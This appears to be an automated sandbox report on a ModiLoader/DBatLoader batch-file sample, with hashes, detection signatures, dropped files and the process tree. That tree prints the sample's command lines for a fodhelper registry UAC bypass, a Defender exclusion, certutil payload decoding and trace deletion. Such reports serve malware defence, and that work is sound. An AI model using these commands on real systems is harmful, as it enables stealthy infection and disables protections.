Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

d622c7b9ad...88.cmd

windows7-x64

10

d622c7b9ad...88.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    14/03/2024, 02:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d622c7b9ad40d8461a606328c463a46a3fc472033dfd59befee7a848e6f75e88.cmd

  • Size

    2.7MB

  • MD5

    7d96782962a1b9dc8bf3cb85d4d04bf0

  • SHA1

    a5dcb4261294eb8d3e084f3e7790d1949c95d5ca

  • SHA256

    d622c7b9ad40d8461a606328c463a46a3fc472033dfd59befee7a848e6f75e88

  • SHA512

    64970e73a8a07bd46fe0f035dd392418ecd8ee4a0c87624dc485f5e185b9b0a05ffd4cd710e50ddb96a59c3072a2674f5c2bc5d807683212e83c18a5a31a7072

  • SSDEEP

    24576:TyNNYYx5WcvYu8TJBD/XMv7AKby+qMfFHMpD0tXCn+RCN1DVkPM:TyNqYxPp8TJp/XMYMf8D0vM

Score
10/10
modiloadertrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d622c7b9ad40d8461a606328c463a46a3fc472033dfd59befee7a848e6f75e88.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1844
    • C:\Windows\system32\cmd.exe
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\system32\extrac32.exe
        extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        3⤵
          PID:1608
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2972
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
          3⤵
            PID:1724
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2524
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            3⤵
              PID:2608
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2232
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2420
                • C:\Windows\system32\reg.exe
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  5⤵
                  • Modifies registry class
                  • Modifies registry key
                  PID:2416
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\d622c7b9ad40d8461a606328c463a46a3fc472033dfd59befee7a848e6f75e88.cmd" "C:\\Users\\Public\\Lewxa.txt" 9
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2564
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\d622c7b9ad40d8461a606328c463a46a3fc472033dfd59befee7a848e6f75e88.cmd" "C:\\Users\\Public\\Lewxa.txt" 9
              3⤵
              • Executes dropped EXE
              PID:2448
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2408
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
              3⤵
              • Executes dropped EXE
              PID:2460
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c PING -n 3 127.0.0.1
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\system32\PING.EXE
              PING -n 3 127.0.0.1
              3⤵
              • Runs ping.exe
              PID:1848
          • C:\Users\Public\Libraries\Lewxa.com
            C:\\Users\\Public\\Libraries\\Lewxa.com
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2496
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 744
              3⤵
              • Loads dropped DLL
              • Program crash
              PID:2004
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:2748
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:2860
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:1760
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:2856
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
            2⤵
            • Executes dropped EXE
            PID:1568
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettings.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1576
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
            2⤵
            • Executes dropped EXE
            PID:2352
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettingsAdminFlows.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
          • C:\Windows\system32\cmd.exe
            cmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S
            2⤵
              PID:1340

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\Lewxa.txt
            Filesize

            344KB

            MD5

            8a285feee4241ba036fb79a6643d272c

            SHA1

            555189da02d35babf6e38f948bad0e990ea70e13

            SHA256

            eb708a1a145b78f1ba1a2d63edd068518dbb7cf0634af93d8eb2895f15c82de6

            SHA512

            c47d85ecc1cbb84d22246fd3ca71cf2b4481751fc8fe06f94cceec13113934c66f5ea419f43b2f91201ded912ce85cdd4fd23a6d36d01a78104af6e21653694d

            Download Submit

          • C:\Users\Public\Libraries\Lewxa.com
            Filesize

            983KB

            MD5

            113e33214f9258499bd29aaf0a3d1c19

            SHA1

            3daf6a078662f96cf39741d5887b686459a87c64

            SHA256

            4f951811b9208ef871db865a022fe7856b582bc6e1bcfbe56466f351eed4de61

            SHA512

            ac53a91bd67d676e5c8f1336cf935a62ab2afae618f644918d70684d6ab046a258a49016d900a1f80b375c79214b41147f3a161ce09c6bfc8cf1c9f45fe06072

            Download Submit

          • C:\Users\Public\kn.exe
            Filesize

            437KB

            MD5

            4eeaf0f6cdbbfb7dcb3499149682eb9a

            SHA1

            f7472bdfeaf81d691cdfe0bc0afe107c43bdd213

            SHA256

            a8e50b2b4ee636e295bc6eee4572c6b6c9db940123d1d76627b615cfc6d06bc0

            SHA512

            48a6e47aa88c083a5d3e926316b642a65ea79233b8ffe1337627bed8d594e271b00485372353b6b1a2dbbc3cce00add882a2a59fc9e55d041bfd95cfcfc9bcbf

            Download Submit

          • C:\Users\Public\kn.exe
            Filesize

            430KB

            MD5

            a7ae5193d37ea2f250cf50c2cd0d0679

            SHA1

            6adfd7ff6ac38d80b6f8efd6ce3aabe718748dc9

            SHA256

            b9f3178b45b6095d65fda88f52b2472d2154000f8ba5b0584b42c627ed20e057

            SHA512

            9bfc412a9c69e67384c299b34a0a3724a0e97e3bb4e3a39560846856d4be775884c0f9a66b9285b5d71688b990c7219edcd2f814374a29c22a0880d4116264a0

            Download Submit

          • C:\Users\Public\kn.exe
            Filesize

            332KB

            MD5

            19a77238ca470057222bb32ba01fdbb9

            SHA1

            401c5c87f59496c8448f8f2136013aec60a71cf4

            SHA256

            f46666ec914958b382fc88d4fa096cb23dfcac1ebc9955327f8c0ea20a2b0edb

            SHA512

            c278cb67371d870d24ee567ff7a3ef3139fc98763da677f8201559a6438facd8ff62ebcb1076fa8badead4bd80a206a977272aca09ccacf18df5e4c566146364

            Download Submit

          • C:\Users\Public\kn.exe
            Filesize

            1.1MB

            MD5

            ec1fd3050dbc40ec7e87ab99c7ca0b03

            SHA1

            ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

            SHA256

            1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

            SHA512

            4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

            Download Submit

          • C:\Users\Public\xkn.exe
            Filesize

            462KB

            MD5

            852d67a27e454bd389fa7f02a8cbe23f

            SHA1

            5330fedad485e0e4c23b2abe1075a1f984fde9fc

            SHA256

            a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

            SHA512

            327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

            Download Submit

          • \Users\Public\alpha.exe
            Filesize

            337KB

            MD5

            5746bd7e255dd6a8afa06f7c42c1ba41

            SHA1

            0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

            SHA256

            db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

            SHA512

            3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

            Download Submit

          • \Users\Public\kn.exe
            Filesize

            497KB

            MD5

            bc5064695ab177015d8a1a946c4b3d03

            SHA1

            600cf30044e8825775c4b365a5cc7e979d16c00f

            SHA256

            aac98e9f608d240451f8ffaa5c8d89315385f82c4a20c3d940d61c8fbe4d3151

            SHA512

            db7cc4301e96328b98fe7693c3af11ce352844b690b8e9da5169f3a6af072292569e564fa79a31dc4b165d64171938b1f8b4b46b5df070f6666bd56a0d60e222

            Download Submit

          • \Users\Public\kn.exe
            Filesize

            373KB

            MD5

            72723eebf5e114ac8f6a15f0c31dd50b

            SHA1

            a765a2330e2747348fdc9ea582955b2cd63ad634

            SHA256

            3e63e60de6ce2a259e0373d68174e1260aa6b95a06ce621061e1a4085661e567

            SHA512

            12b6b1c8f32abc72208d67bce289603cacf37bfbeab4af2804f6653bb74e7f1dccad014c15f47eeba6353c6e8a139722aaf5fa44584fd8093d6735900c2a38fb

            Download Submit

          • memory/2232-30-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2232-22-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2232-34-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2232-32-0x00000000027D0000-0x0000000002850000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2232-31-0x00000000027D4000-0x00000000027D7000-memory.dmp

            Filesize

            12KB

            Download

          • memory/2232-29-0x00000000027D0000-0x0000000002850000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2232-28-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2232-33-0x00000000027D0000-0x0000000002850000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2232-21-0x000000001B340000-0x000000001B622000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/2496-61-0x00000000031C0000-0x00000000041C0000-memory.dmp

            Filesize

            16.0MB

            Download

          • memory/2496-62-0x00000000031C0000-0x00000000041C0000-memory.dmp

            Filesize

            16.0MB

            Download

          • memory/2496-55-0x0000000000400000-0x0000000000500000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/2496-54-0x0000000000300000-0x0000000000301000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2496-65-0x0000000000300000-0x0000000000301000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2496-66-0x0000000000400000-0x0000000000500000-memory.dmp

            Filesize

            1024KB

            Download